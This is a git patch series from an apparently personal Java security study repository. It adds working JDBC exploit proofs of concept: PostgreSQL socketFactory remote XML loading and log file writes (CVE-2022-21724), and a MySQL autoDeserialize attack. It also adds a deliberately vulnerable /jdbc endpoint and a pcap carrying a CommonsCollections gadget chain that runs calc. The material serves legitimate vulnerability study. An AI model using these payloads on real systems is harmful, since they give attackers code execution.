zs-Fm5X*ry7CH|>Q``oddahJW*Tx7IA_P5KYAAIQTTQ$fpLZ?*}RgB?qwhxc*3?*1^ z&9?Whi#RpU1alUeK3$|XX2nz!j7yF2jp3peJcfJn?NiSW24A$3C~9~p;Sn4=h(a+~ zBou+YwE0gzKL6I&(#S*9=|)zC6tG7yDjJ4tuobfCrg82cFW!1);-`m|x@E4()`WP-J)|XCIBCy6~!V%q8 zzVq@^JJ+B6%M*$ITneVj)ieugxYs+oF24S&&G-F2584#ob?_=OrS|&_^hi8if|_TW d4gdB-Q5@=cO@~2xZ#44z_U*$ Date: Sun, 12 Oct 2025 14:23:15 +0800 Subject: [PATCH 06/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0mysql?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../inspectionProfiles/Project_Default.xml | 8 +++++ JDBC/PostgreSql/pom.xml | 4 +-- .../src/main/java/com/test/DirectConnect.java | 6 ++-- .../main/java/com/test/StartApplication.java | 7 +++++ .../src/main/java/com/test/UrlEncodeFile.java | 12 ++++++++ .../com/test/controller/IndexController.java | 24 +++++++++++++++ .../src/main/java/com/test/exp/FileWrite.java | 13 ++++++++ .../main/java/com/test/exp/SocketFactory.java | 12 ++++++++ .../src/main/resources/application.yml | 2 ++ JDBC/mysql/.gitignore | 29 ++++++++++++++++++ JDBC/mysql/.idea/.gitignore | 8 +++++ JDBC/mysql/.idea/compiler.xml | 14 +++++++++ JDBC/mysql/.idea/encodings.xml | 9 ++++++ JDBC/mysql/.idea/jarRepositories.xml | 20 ++++++++++++ JDBC/mysql/.idea/misc.xml | 15 +++++++++ JDBC/mysql/.idea/modules.xml | 8 +++++ JDBC/mysql/.idea/vcs.xml | 6 ++++ JDBC/mysql/SpringTarget/pom.xml | 10 +++++- .../src/main/resources/application.yml | 2 ++ JDBC/mysql/YsoserialGadgetGenerate.bin | Bin 4060 -> 4060 bytes JDBC/mysql/final.pcap | 5 ++- JDBC/mysql/hex.bin | 0 JDBC/mysql/hex.pcap | Bin 5188 -> 5217 bytes JDBC/mysql/hex1.bin | 0 JDBC/mysql/hex1.pcap | Bin 4060 -> 4060 bytes JDBC/mysql/mysql.iml | 11 +++++++ JDBC/mysql/no-outbound/pom.xml | 15 ++++++++- .../no-outbound/src/main/java/exp/Exp.java | 16 ++++++++++ .../no-outbound/target/classes/exp/Exp.class | Bin 0 -> 1882 bytes 29 files changed, 247 insertions(+), 9 deletions(-) create mode 100644 JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml create mode 100644 JDBC/mysql/.gitignore create mode 100644 JDBC/mysql/.idea/.gitignore create mode 100644 JDBC/mysql/.idea/compiler.xml create mode 100644 JDBC/mysql/.idea/encodings.xml create mode 100644 JDBC/mysql/.idea/jarRepositories.xml create mode 100644 JDBC/mysql/.idea/misc.xml create mode 100644 JDBC/mysql/.idea/modules.xml create mode 100644 JDBC/mysql/.idea/vcs.xml create mode 100644 JDBC/mysql/hex.bin create mode 100644 JDBC/mysql/hex1.bin create mode 100644 JDBC/mysql/mysql.iml create mode 100644 JDBC/mysql/no-outbound/target/classes/exp/Exp.class diff --git a/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..4df5f76 --- /dev/null +++ b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,8 @@ + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml index 3ca70dd..428bb21 100644 --- a/JDBC/PostgreSql/pom.xml +++ b/JDBC/PostgreSql/pom.xml @@ -18,12 +18,12 @@ org.springframework.boot spring-boot-starter-web - 2.7.15 + 2.7.13 org.postgresql postgresql - 42.3.0 + 42.3.1 diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java index b197cc3..a62fbd2 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -9,7 +9,9 @@ public static void main(String[] args) throws SQLException { Driver driver = new Driver(); String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; - String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt"; - driver.connect(url, null); + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=D:/log.txt"; + String url3 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/postgre_origin.jar!/1.xml"; + String url4 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + driver.connect(url3, null); } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java index 782a11a..7edaef0 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java @@ -1,4 +1,11 @@ package com.test; +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication public class StartApplication { + public static void main(String[] args) { + SpringApplication.run(StartApplication.class, args); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java index da75283..e0c0cde 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java @@ -1,4 +1,16 @@ package com.test; +import ch.qos.logback.core.util.FileUtil; + +import java.io.IOException; +import java.net.URLEncoder; +import java.nio.file.Files; +import java.nio.file.Paths; + public class UrlEncodeFile { + public static void main(String[] args) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get("./ascii.jar")); + String encode = URLEncoder.encode(new String(bytes), "utf-8"); + System.out.println(encode); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java index ce5482e..f19a25a 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java @@ -1,4 +1,28 @@ package com.test.controller; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.ResponseBody; + +import java.io.PrintWriter; +import java.io.StringWriter; +import java.sql.DriverManager; + +@Controller public class IndexController { + + @ResponseBody + @RequestMapping("/jdbc") + public String jdbc(String url) { + try { + DriverManager.getConnection(url); + + } catch (Exception e) { + StringWriter sw = new StringWriter(); + e.printStackTrace(new PrintWriter(sw)); + return sw.toString(); + } + return "done."; + } + } diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java index d233770..ca86bc7 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java @@ -1,4 +1,17 @@ package com.test.exp; +import org.postgresql.Driver; + +import java.sql.SQLException; + +// CVE-2022-21724 +// 写入的文件前后会有其他字符 public class FileWrite { + public static void main(String[] args) throws SQLException { + String file = "file content"; + Driver driver = new Driver(); + String url1 = "jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=D:/log.txt&{{file}}"; + String replace = url1.replace("{{file}}", file); + driver.connect(replace, null); + } } diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java index df0ced7..8d153fa 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java @@ -1,4 +1,16 @@ package com.test.exp; +import org.postgresql.Driver; + +import java.sql.SQLException; + +// 本质是调用构造方法 public class SocketFactory { + public static void main(String[] args) throws SQLException { + String url1 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url2 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + String url3 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/1.jar!/1.xml"; + Driver driver = new Driver(); + driver.connect(url1, null); + } } diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml index e69de29..54b155f 100644 --- a/JDBC/PostgreSql/src/main/resources/application.yml +++ b/JDBC/PostgreSql/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8081 \ No newline at end of file diff --git a/JDBC/mysql/.gitignore b/JDBC/mysql/.gitignore new file mode 100644 index 0000000..f68d109 --- /dev/null +++ b/JDBC/mysql/.gitignore @@ -0,0 +1,29 @@ +### IntelliJ IDEA ### +out/ +!**/src/main/**/out/ +!**/src/test/**/out/ + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache +bin/ +!**/src/main/**/bin/ +!**/src/test/**/bin/ + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/JDBC/mysql/.idea/.gitignore b/JDBC/mysql/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/JDBC/mysql/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/JDBC/mysql/.idea/compiler.xml b/JDBC/mysql/.idea/compiler.xml new file mode 100644 index 0000000..51e1d07 --- /dev/null +++ b/JDBC/mysql/.idea/compiler.xml @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/encodings.xml b/JDBC/mysql/.idea/encodings.xml new file mode 100644 index 0000000..29cf8bf --- /dev/null +++ b/JDBC/mysql/.idea/encodings.xml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/jarRepositories.xml b/JDBC/mysql/.idea/jarRepositories.xml new file mode 100644 index 0000000..c364a09 --- /dev/null +++ b/JDBC/mysql/.idea/jarRepositories.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/misc.xml b/JDBC/mysql/.idea/misc.xml new file mode 100644 index 0000000..fa904e2 --- /dev/null +++ b/JDBC/mysql/.idea/misc.xml @@ -0,0 +1,15 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/modules.xml b/JDBC/mysql/.idea/modules.xml new file mode 100644 index 0000000..be9deab --- /dev/null +++ b/JDBC/mysql/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/vcs.xml b/JDBC/mysql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/mysql/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/pom.xml b/JDBC/mysql/SpringTarget/pom.xml index bf38253..6f5daac 100644 --- a/JDBC/mysql/SpringTarget/pom.xml +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -13,5 +13,13 @@ 8 UTF-8 - + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml index e69de29..be88d37 100644 --- a/JDBC/mysql/SpringTarget/src/main/resources/application.yml +++ b/JDBC/mysql/SpringTarget/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8085 \ No newline at end of file diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin index 795c3f61f528717738597e9b4c2a86449ce8f373..4bb9518bceb96e0982ff4b0b7a4b944bd5009d75 100644 GIT binary patch delta 100 zcmca3e@A|TPh==5{BH$;=-Kxyu^~svefv3#Ny)e{Gt?wjZ4k>0ddYBK>z>% delta 100 zcmca3e@A|TPoxB@FBg3`{^(AS?pJ%)uW1 f;R?a7!NH#XehR@Mjv=AJj0_B{%u*Ydn)3qy09g|h diff --git a/JDBC/mysql/final.pcap b/JDBC/mysql/final.pcap index f623356..745f674 100644 --- a/JDBC/mysql/final.pcap +++ b/JDBC/mysql/final.pcap @@ -1,6 +1,5 @@ J... -5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password.......:.....!.......................root...&....av....S.M -.f..test.mysql_native_password..._runtime_version 1.8.0_341._client_version.5.1.47._client_name.MySQL Connector Java._client_license.GPL._runtime_vendor.Oracle Corporation.............................SHOW SESSION STATUS..........def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password......................def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. detailMessaget..Ljava/lang/String;[. stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. lineNumberL..declaringClassq.~..L..fileNameq.~..L. @@ -14,4 +13,4 @@ access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.F pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. getRuntimeur..[Ljava.lang.Class;......Z....xp....t. getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. -loadFactorI. thresholdxp?@......w.........xx......."......../* mysql-connector-java-5.1.47 ( Revision: fe1903b1ecb4a96a917f7ed3190d80c049b1de29 ) */SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout \ No newline at end of file +loadFactorI. thresholdxp?@......w.........xx......."... \ No newline at end of file diff --git a/JDBC/mysql/hex.bin b/JDBC/mysql/hex.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap index d04bd062c8b9f0c925942d776b3965ed8bb32e9a..fea6256604a2f5f090cda5b2bb2ca60f537a867d 100644 GIT binary patch delta 14 VcmX@2@la!fi^ybeMrkGnMgS=_1N#5~ delta 7 OcmaE;aYSQ-iwFP?J_7y# diff --git a/JDBC/mysql/hex1.bin b/JDBC/mysql/hex1.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex1.pcap b/JDBC/mysql/hex1.pcap index 795c3f61f528717738597e9b4c2a86449ce8f373..4bb9518bceb96e0982ff4b0b7a4b944bd5009d75 100644 GIT binary patch delta 100 zcmca3e@A|TPh==5{BH$;=-Kxyu^~svefv3#Ny)e{Gt?wjZ4k>0ddYBK>z>% delta 100 zcmca3e@A|TPoxB@FBg3`{^(AS?pJ%)uW1 f;R?a7!NH#XehR@Mjv=AJj0_B{%u*Ydn)3qy09g|h diff --git a/JDBC/mysql/mysql.iml b/JDBC/mysql/mysql.iml new file mode 100644 index 0000000..c90834f --- /dev/null +++ b/JDBC/mysql/mysql.iml @@ -0,0 +1,11 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/pom.xml b/JDBC/mysql/no-outbound/pom.xml index 03de165..136d7a3 100644 --- a/JDBC/mysql/no-outbound/pom.xml +++ b/JDBC/mysql/no-outbound/pom.xml @@ -13,5 +13,18 @@ 8 UTF-8 - + + + + mysql + mysql-connector-java + 5.1.47 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java index 3d5261f..11cf983 100644 --- a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -1,4 +1,20 @@ package exp; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.SQLException; + public class Exp { + public static void main(String[] args) throws SQLException { + String url = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root"; + String noOutBound = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root&socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=hex.pcap"; + String username = "root"; + String password = "root"; + try (Connection connection = DriverManager.getConnection(noOutBound, username, password)) { + System.out.println("数据库连接成功!"); + } catch (SQLException e) { + System.out.println("数据库连接失败!"); + e.printStackTrace(); + } + } } diff --git a/JDBC/mysql/no-outbound/target/classes/exp/Exp.class b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class new file mode 100644 index 0000000000000000000000000000000000000000..dbd3edc4bfb79e2e44c0c9c10d6d609a5dd47730 GIT binary patch literal 1882 zcmd5-OK%%h6#gcDjP2M-acEleDgkPe(%MNwNtrY)mp?7BeWXC&&cAbfX{+D?-NOC0+?&OPUR=bU@Ko4@{f z{3n2SaW#Qs$iBydT`NDP+~NaBi)4|IH} zA$rNOE&sBHP;cLohVYnEk{UV-mM!P%)n(}}iscF=>4Ia5%93y`wci(p{T0j85HHBJ zT7F`!HcSUqVc8nGdp{|xiW?$d5q3FW^j*s?4=aF#>Dab3eaoTN@jV^y^GbfKA*K_J zfG3(~#jAyhHB;7iWDu69SYODIb?Ie2U-+^rZGYPKC4JX? z$Mr@`r`ItJy@0E3R`>b$$|am}ln( zN2+mKoAa>m?H@Ov{`#;di3R0Q-{*;jV@=od%d6zW0nr{`o&|7_9>i#1kGmFce^%I{ zEM0bQS^7;LX_)OjOoRU->1$H2>5jx}3A(uMu~SJmr_Rv#d2BiP1rpt7_)=79uvfr? zVpgH1lq!n|S zq!%gG4a&ES!07Zrqi!Qkqj+GH*f+|=wl!{*SoCf zw=9V&*A#S?Y85ZxWkh(I!Yg={E0zhb;S}c(?%{R%;=dbOzQI)+QSRVPu0quR3U6^0 z#%by@&Rr&<>&WVOyXD)fqYoN~_Gu1N{OuAxezaagH@Zu#$a6|iulkt|)(b?{f(t*( IbsNt83nLxk82|tP literal 0 HcmV?d00001 From a215d303cda0789eeaef2b19ce0edaa452f64c7f Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 13 Oct 2025 19:53:15 +0800 Subject: [PATCH 07/16] =?UTF-8?q?doc:=20=E6=9B=B4=E6=96=B0=E8=A1=A8?= =?UTF-8?q?=E8=BE=BE=E5=BC=8F+SSTI?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/test/pojo/Person.java" | 4 ++ .../java/com/test/study/define2Load.java" | 4 ++ .../src/main/java/com/test/study/tmp.java" | 4 ++ .../src/main/java/com/test/pojo/Student.java" | 4 ++ .../java/com/test/study/RuntimeExec.java" | 4 ++ .../src/main/java/com/test/study/tmp.java" | 4 ++ README.md | 42 ++++++++++++++++++- .../main/java/com/test/WebApplication.java | 4 ++ .../com/test/controller/HelloController.java | 4 ++ .../test/controller/vul/TestController.java | 4 ++ .../src/main/java/com/test/pojo/User.java | 4 ++ .../src/main/resources/application.yml | 0 .../src/main/resources/static/app.css | 0 .../main/resources/templates/component.html | 10 +++++ .../src/main/resources/templates/date.html | 10 +++++ .../src/main/resources/templates/index.html | 10 +++++ .../src/main/resources/templates/page.html | 10 +++++ .../main/java/com/spring/WebApplication.java" | 4 ++ .../spring/controller/TestController.java" | 4 ++ .../src/main/java/com/test/BasicUsage.java" | 4 ++ .../SPEL/src/main/java/com/test/RceEcho.java" | 4 ++ .../src/main/java/com/test/RcePart1.java" | 4 ++ .../src/main/java/com/test/RcePart2.java" | 4 ++ .../SPEL/src/main/resources/application.yml" | 0 24 files changed, 145 insertions(+), 1 deletion(-) create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/WebApplication.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/HelloController.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/controller/vul/TestController.java create mode 100644 SSTI/Thymeleaf/src/main/java/com/test/pojo/User.java create mode 100644 SSTI/Thymeleaf/src/main/resources/application.yml create mode 100644 SSTI/Thymeleaf/src/main/resources/static/app.css create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/component.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/date.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/index.html create mode 100644 SSTI/Thymeleaf/src/main/resources/templates/page.html create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" create mode 100644 "\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" new file mode 100644 index 0000000..f603f37 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Person { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" new file mode 100644 index 0000000..ef2c366 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class define2Load { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..d901a07 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class tmp { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" new file mode 100644 index 0000000..90ac535 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Student.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Student { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" new file mode 100644 index 0000000..c630665 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class RuntimeExec { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..d901a07 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class tmp { +} diff --git a/README.md b/README.md index 1867955..d036f36 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,7 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) - [代码和jar包调试](#代码和jar包调试) +- [查漏补缺](#查漏补缺) - [反序列化](#反序列化) - [JNDI](#JNDI) - [JDBC](#JDBC) @@ -13,6 +14,7 @@ - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) +- [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) - [SpringBoot](#SpringBoot) - [工具开发/二开](#devTools) @@ -99,7 +101,7 @@
-# 查漏补缺 +# 查漏补缺 主要记录一些新遇到的小知识。 @@ -403,6 +405,36 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 +
+ +## + +# 表达式+SSTI + +## SPEL + +[SpEL表达式注入漏洞学习和回显poc研究 - bitterz - 博客园](https://www.cnblogs.com/bitterz/p/15206255.html#语法基础) 写的比较简洁,可以按里面搭Web环境 + +[SpEL注入RCE分析与绕过-先知社区](https://xz.aliyun.com/news/8744) payload比较完整 + +[Java 之 SpEL 表达式注入 | Drunkbaby's Blog](https://drun1baby.top/2022/09/23/Java-之-SpEL-表达式注入/) 写的很详细,包括SPEL用法 + +
